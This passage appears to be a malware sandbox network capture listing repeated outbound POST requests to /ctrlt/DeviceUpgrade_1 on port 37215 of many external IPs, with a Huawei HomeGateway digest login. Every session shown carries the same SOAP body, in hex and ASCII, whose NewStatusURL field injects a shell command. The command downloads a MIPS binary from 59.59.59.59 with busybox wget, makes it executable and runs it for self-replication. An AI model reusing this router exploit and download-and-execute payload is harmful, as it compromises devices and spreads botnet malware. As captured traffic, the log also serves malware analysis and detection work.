                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2218192.168.2.1539250157.233.248.7137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.277497053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2219192.168.2.1535562157.212.108.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282649994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2220192.168.2.155055041.69.3.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282666922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2221192.168.2.1554230197.61.61.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282696009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2222192.168.2.155854041.210.234.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282833099 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2223192.168.2.156010041.165.42.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282852888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2224192.168.2.1534426197.47.35.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282876968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2225192.168.2.153949045.26.28.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.282900095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2226192.168.2.1547758157.145.199.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.288978100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2227192.168.2.155500041.111.203.25537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.289001942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
